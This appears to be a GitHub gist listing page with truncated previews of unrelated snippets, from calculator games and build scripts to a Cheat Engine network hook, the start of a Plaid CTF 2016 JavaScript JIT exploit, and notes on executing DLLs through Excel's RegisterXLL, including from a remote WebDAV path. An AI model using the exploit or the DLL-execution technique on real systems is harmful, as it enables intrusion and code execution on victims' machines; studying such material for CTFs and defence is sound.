boy1337 bb33bb

@Gozala
Gozala / html_iframe.js
Last active July 29, 2019 07:01
nesting frames
// Security Error: Content at about:srcdoc may not load or link to resource://jid1-pss5nuwzdn1n3a-at-jetpack/signals/data/index.html.
let XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
let HTML_NS = "http://www.w3.org/1999/xhtml";
let toolbar = document.createElementNS(XUL_NS, "toolbar");
toolbar.setAttribute("collapsed", false);
toolbar.setAttribute("style", "height: 80px;");
let toolbox = document.getElementById("navigator-toolbox");
@robb83
robb83 / ce_hook_network.lua
Last active June 13, 2022 07:47
Cheat Engine Scripts
-- Simple network hook script
addressOfSend = getAddress("WS2_32.send")
addressOfGetStatus1 = getAddress("Kernel32.GetQueuedCompletionStatus")
addressOfGetStatus2 = getAddress("Kernel32.GetQueuedCompletionStatusEx")
addressOfCreateIoCompletionPort = getAddress("Kernel32.CreateIoCompletionPort")
print(string.format("WS2_32.send = %x, Kernel32.GetQueuedCompletionStatus = %x, Kernel32.GetQueuedCompletionStatusEx = %x, Kernel32.CreateIoCompletionPort = %x", addressOfSend, addressOfGetStatus1, addressOfGetStatus2, addressOfCreateIoCompletionPort))
debug_removeBreakpoint(addressOfSend)
debug_removeBreakpoint(addressOfGetStatus1)
debug_removeBreakpoint(addressOfGetStatus2)
Title : Revisiting Mac OS X Kernel Rootkits
Author : fG!
Date : April 18, 2014
|=----------------------------------------------------------------------------=|
|=----------------=[ Revisiting Mac OS X Kernel Rootkits ]=-------------------=|
|=----------------------------------------------------------------------------=|
|=------------------------=[ fG! <[email protected]> ]=---------------------------=|
|=----------------------------------------------------------------------------=|
@sroettger
sroettger / js_sandbox.js
Created April 17, 2016 21:09
Exploit for the js_sandbox challenge of Plaid CTF 2016
with (true) {
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
function f(){
var x = 8;
var y = 0xffffffff;
var ind = x & y;
x = 16;
y = 0xffffffff;
var ind2 = ind + (x&y);
@Siguza
Siguza / t2048.c
Last active March 8, 2022 08:00
2048 for your calculator! :D
/*
* t2048.c - 2048 for some TI calculators
*
* Copyright (c) 2014 Siguza
*
* Tested on TI-89 Titanium only. According to headers, it should work on TI-92 and Voyage 200 as well, but no promises.
* To be compiled with ti-gcc - as far as I remember, TI's own C compiler can't handle this.
*
* Licensed under MIT, i.e. feel free to use and redistribute at will, but I'd appreciate some credit. :)
*/
@Siguza
Siguza / img3ex.c
Created September 18, 2016 14:07
Img3 extractor
/*
* img3ex.c - Extract Img3 files from any binary blob, e.g. a /dev/disk* dump.
*
* Placed in the Public Domain, do whatever you want with it. No warranty of any kind.
*
* Compile with: cc -o img3ex -std=c11 -Wall -O3 img3ex.c
*/
#include <errno.h> // errno
#include <fcntl.h> // open, O_RDONLY
@Alexhuszagh
Alexhuszagh / com.cpp
Last active June 26, 2022 01:21
Example Using COM IDispatch Interface
/** Example using the COM interface without AutoCOM. The entire
* file can be automated with AutoCOM in under 15-lines of code.
*
* #include "autocom.hpp"
* int main(int argc, char *argv[])
* {
* com::Bstr text;
* com::Dispatch dispatch("VBScript.RegExp");
* dispatch.put("Pattern", L"\\w+");
* for (auto match: dispatch.iter("Execute", L"A(b) c35 d_[x] yyy")) {
Moved here: https://github.com/Siguza/ios-build/blob/master/libimobiledevice/build.sh
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@artynet
artynet / cross-compile-zlib-windows.sh
Last active July 15, 2021 03:19
Cross compile zLib for mingw32-w64
#!/bin/bash
# PREFIXDIR=$HOME/Programmi/Zlib-1.2.11-win32-x86
PREFIXDIR=$HOME/Programmi/win32-cross
make -f win32/Makefile.gcc BINARY_PATH=$PREFIXDIR/bin INCLUDE_PATH=$PREFIXDIR/include LIBRARY_PATH=$PREFIXDIR/lib SHARED_MODE=1 PREFIX=i686-w64-mingw32- install